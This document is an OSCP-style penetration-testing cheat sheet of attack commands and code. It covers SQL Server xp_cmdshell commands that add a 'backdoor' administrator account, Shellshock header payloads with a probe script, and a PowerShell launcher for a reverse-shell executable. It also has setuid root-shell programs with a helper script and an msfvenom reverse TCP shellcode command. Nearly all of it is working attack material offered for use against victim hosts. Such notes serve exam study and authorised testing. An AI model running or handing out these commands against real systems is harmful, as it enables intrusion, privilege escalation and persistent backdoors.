OSCP tricks
+ Upgrading simple shells to fully interactive TTYs
+ Make browser appear as a search engine
+ Change headers of a http request using curl
+ Execute process as another user (with credentials)
+ Setuid binary for root shell
+ Leverage xp_cmdshell to get a shell
+ Bypassing white-listing
+ Create small shellcode
+ Upgrading simple shells to fully interactive TTYs
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
+ Temporary Web Server
python -m SimpleHTTPServer    (Python 2, serves the current directory on port 8000)
python3 -m http.server    (Python 3, same default port)
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"
php -S 0.0.0.0:8888
+ Use Nmap to remotely execute commands through SQL
The ms-sql-xp-cmdshell script needs credentials for an account with the sysadmin role:
nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse <victim_ip> -p1433 --script-args mssql.username=sa,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net user backdoor backdoor123 /add"
nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse 10.11.1.31 -p1433 --script-args mssql.username=<sql_user>,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net localgroup administrators backdoor /add"
+ Make browser appear as a search engine
Use curl with a search engine user agent (googlebot, slurp, msnbot, ...); some sites serve different content, or skip access controls, for crawlers:
curl -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' 'http://<victim_ip>/robots.txt'
+ Change headers of an HTTP request using curl
Example: check for Shellshock (CVE-2014-6271) by putting a bash function definition followed by an extra command into a header that the CGI handler exports as an environment variable (PoC: '() { :; }; echo "CVE-2014-6271 vulnerable"; bash -c id'):
curl -H 'User-Agent: () { :; }; echo "CVE-2014-6271 vulnerable"; bash -c id' http://10.11.1.71/cgi-bin/admin.cgi
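Added example (not code from the original post): a local Shellshock check that shows the mechanism the curl line relies on, plus a remote probe that tries the header names CGI servers commonly export as environment variables. The target URL, the marker string and the `id` command are placeholders; the remote probe assumes curl is installed. The two leading `echo` calls in the payload close the CGI's header block, so the marker and the command output land in the HTTP body instead of producing a malformed-header error.

```shell
#!/bin/sh
# Added example, not part of the original post. POSIX sh; remote part needs curl.

# Local check: an unpatched bash executes the command that follows the function
# definition while importing the exported variable x. Prints "vulnerable" or "patched".
shellshock_local_check() {
    local out
    out=$(env x='() { :; }; echo SHELLSHOCK_MARKER' bash -c : 2>/dev/null) || true
    case "$out" in
        *SHELLSHOCK_MARKER*) echo vulnerable ;;
        *)                   echo patched ;;
    esac
}

# Header value for the remote probe: function definition, two echos to end the
# CGI headers, the marker, then the command. $1 = marker, $2 = simple command.
shellshock_header_value() {
    printf '() { :; }; echo; echo; echo %s; /bin/bash -c %s' "$1" "${2:-id}"
}

# Remote probe: send the payload in User-Agent, Referer and Cookie (all exported
# as HTTP_* variables by CGI handlers). Returns 0 when the marker comes back.
# Assumed usage: shellshock_remote_probe http://<victim_ip>/cgi-bin/admin.cgi
shellshock_remote_probe() {
    local url marker payload hdr
    url=$1
    marker="cve_2014_6271_$$"            # unique per run, so cached pages cannot fool us
    payload=$(shellshock_header_value "$marker" id)
    for hdr in User-Agent Referer Cookie; do
        if curl -s -m 10 -H "$hdr: $payload" "$url" | grep -q "$marker"; then
            echo "vulnerable via $hdr header"
            return 0
        fi
    done
    echo "no marker returned"
    return 1
}
```

The local check is what to run on a box you already have a shell on; the remote probe is the curl line from above generalised to several headers, because which header reaches bash depends on the CGI program and server.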
+ Execute process as another user (with credentials)
- Create a ps1 file, e.g. run.ps1, with the PowerShell commands below. The Process.Start overload used here takes the file name, the arguments, the user name, the password as a SecureString and the domain; for a local account pass the computer name as the domain. It relies on CreateProcessWithLogonW, so the Secondary Logon (seclogon) service must be running:
$secpasswd = ConvertTo-SecureString "<admin_pass_clear_text>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<Admin_username>", $secpasswd)
$computer = "<COMPUTER_NAME>"
[System.Diagnostics.Process]::Start("C:\users\public\<reverse_shell.exe>", "", $mycreds.UserName, $mycreds.Password, $computer)
- Upload run.ps1 to the victim's machine
- Execute the PowerShell command:
powershell -ExecutionPolicy Bypass -File c:\users\public\run.ps1
+ Setuid binary for root shell
https://infamoussyn.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(void)
{
    /* Both calls only succeed because the binary is setuid root (euid 0);
       setuid(0) then makes the real uid 0 too, so bash keeps the privileges. */
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
Alternatively
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    setuid(0);                          /* needs the setuid-root bit on this binary */
    execl("/bin/sh", "sh", (char *)NULL);
    perror("execl");                    /* only reached if the exec failed */
    return 1;
}
gcc -o /var/tmp/rootme rootme.c
chown root:root /var/tmp/rootme && chmod 4777 /var/tmp/rootme
The chown and chmod must be run as root (in the linked post, through the MySQL UDF), and in that order: chown clears any setuid bit, so chmod has to come after it.
Alternatively
cp /bin/sh /tmp/root_shell; chmod a+s /tmp/root_shell;
/tmp/root_shell -p
Again the copy must be made by root so that the file is root-owned. The -p flag is bash's privileged mode: without it bash resets the effective uid to the real uid at startup, so it is needed when /bin/sh is bash (dash does not drop privileges that way).
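Added example (not code from the original post): the checks a practitioner wants around the setuid-shell trick above. It verifies that a binary is really root-owned and setuid (a copy made by a non-root user gives nothing), picks the `-p` flag only when the shell is bash, and refuses to build the shell unless running as root. Paths are placeholders; `is_root_suid` assumes a find that understands `-maxdepth`, `-user` and `-perm` (GNU, BSD and busybox do).

```shell
#!/bin/sh
# Added example, not part of the original post.

# Returns 0 if $1 is owned by root and has the setuid bit, 1 otherwise.
# Does not follow symlinks: the shell copy is a regular file.
is_root_suid() {
    [ -n "$(find "$1" -maxdepth 0 -user root -perm -4000 2>/dev/null)" ]
}

# Prints "-p" when the shell at $1 (resolved through symlinks) is bash, since bash
# resets euid to the real uid at startup unless started in privileged mode.
shell_flag_for() {
    case "$(readlink -f "$1" 2>/dev/null || echo "$1")" in
        */bash) echo "-p" ;;
        *)      echo "" ;;
    esac
}

# Builds a setuid copy of /bin/sh at $1 (default /tmp/root_shell). Only root can
# produce a root-owned file, so it refuses otherwise. chown first, then chmod:
# chown clears the setuid bit on Linux.
build_root_shell() {
    local dest
    dest=${1:-/tmp/root_shell}
    if [ "$(id -u)" -ne 0 ]; then
        echo "build_root_shell: must run as root (e.g. via the UDF or a root cron job)" >&2
        return 1
    fi
    cp /bin/sh "$dest" && chown root:root "$dest" && chmod 4755 "$dest" || return 1
    if ! is_root_suid "$dest"; then
        echo "build_root_shell: $dest is not a root-owned setuid file" >&2
        return 1
    fi
    echo "run: $dest $(shell_flag_for /bin/sh)"
}
```

Run `is_root_suid /tmp/root_shell` after the chown/chmod step from the section above; if it fails, the copy was not made as root and the `-p` invocation will just give you your own uid back.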
+ Leverage xp_cmdshell to get a shell
Connect with sqsh (the account needs the sysadmin role to change these options; "go" sends the batch):
sqsh -S <ip_address> -U sa -P <password>
exec sp_configure 'show advanced options', 1
go
reconfigure
go
exec sp_configure 'xp_cmdshell', 1
go
reconfigure
go
xp_cmdshell 'dir C:\'
go
+ Bypassing white-listing
http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html
+ Create small shellcode
msfvenom -p windows/shell_reverse_tcp -a x86 -f python --platform windows LHOST=<ip> LPORT=443 -b "\x00" EXITFUNC=thread --smallest -e x86/fnstenv_mov
